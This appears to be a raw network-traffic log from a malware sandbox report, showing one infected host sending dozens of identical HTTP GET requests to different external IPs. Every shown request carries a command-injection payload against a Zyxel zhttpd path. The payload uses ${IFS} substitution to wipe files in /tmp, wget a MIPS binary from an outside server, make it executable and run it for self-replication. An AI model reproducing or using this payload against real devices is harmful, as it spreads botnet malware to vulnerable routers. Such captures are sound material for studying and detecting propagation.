                                                Jan 29, 2024 07:07:46.301901102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3854192.168.2.2348288180.148.147.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.301964998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3855192.168.2.2336198129.112.138.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302020073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3856192.168.2.2352158181.242.24.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302090883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3857192.168.2.2340378196.218.148.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302151918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3858192.168.2.2346168178.48.213.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302222013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3859192.168.2.233505093.183.109.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302292109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3860192.168.2.23389905.220.112.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302360058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3861192.168.2.235283885.194.172.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302409887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3862192.168.2.2353206173.249.204.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302479982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3863192.168.2.2357452213.80.190.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302548885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3864192.168.2.2343214157.19.110.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302607059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3865192.168.2.234690074.37.66.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302663088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3866192.168.2.235599657.228.34.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302721977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3867192.168.2.234258887.5.213.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302763939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3868192.168.2.235923476.236.120.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302819014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3869192.168.2.2360480121.192.201.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302879095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3870192.168.2.2359174152.227.39.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302932978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3871192.168.2.2346584106.188.236.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.302990913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3872192.168.2.2350380202.123.243.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303037882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3873192.168.2.2342934200.224.50.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303107023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3874192.168.2.2351646177.105.170.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303147078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3875192.168.2.2333866185.40.239.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303220034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3876192.168.2.2332972200.92.109.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303308964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3877192.168.2.234562887.94.82.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303349972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3878192.168.2.233590841.47.48.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303422928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3879192.168.2.236003048.61.56.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303498983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3880192.168.2.2356518140.107.139.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303560972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3881192.168.2.2354074167.101.207.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303626060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3882192.168.2.2342658198.201.90.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303689957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3883192.168.2.2352912208.108.112.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303764105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3884192.168.2.234672417.89.187.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303817034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3885192.168.2.2344826206.106.168.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303870916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3886192.168.2.234876299.188.26.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303936958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3887192.168.2.2350776195.155.128.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.303993940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3888192.168.2.234842087.191.140.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304069042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3889192.168.2.2355672202.22.16.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304120064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3890192.168.2.235086841.67.100.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304169893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3891192.168.2.2359716208.45.150.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304222107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3892192.168.2.233758013.84.127.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304276943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3893192.168.2.2352668173.76.160.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304351091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3894192.168.2.2345126193.154.65.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304400921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3895192.168.2.2335570174.139.39.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304480076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3896192.168.2.2340950155.40.158.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304538965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3897192.168.2.2346426113.140.174.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304595947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3898192.168.2.2345204148.189.147.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304670095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3899192.168.2.2346446124.232.31.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304733992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3900192.168.2.234206672.172.153.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304790974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3901192.168.2.234729678.3.59.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304861069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3902192.168.2.235451893.95.104.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304927111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3903192.168.2.2358030150.139.21.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.304987907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3904192.168.2.2334242186.141.254.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305047989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3905192.168.2.2348218168.214.152.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305103064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3906192.168.2.235941245.244.208.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305154085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3907192.168.2.2345904205.67.49.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305259943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3908192.168.2.233999035.0.228.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305319071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3909192.168.2.2356186204.109.233.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305360079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3910192.168.2.2357224209.142.19.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305387020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3911192.168.2.2339140108.107.127.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305506945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3912192.168.2.2350146199.90.101.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305516005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3913192.168.2.2351786212.81.250.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305536032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3914192.168.2.234100864.131.79.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305660009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3915192.168.2.2334744175.222.57.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305658102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3916192.168.2.233976050.219.2.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.305722952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3917192.168.2.234559289.1.114.140443
                                                TimestampBytes transferredDirectionData
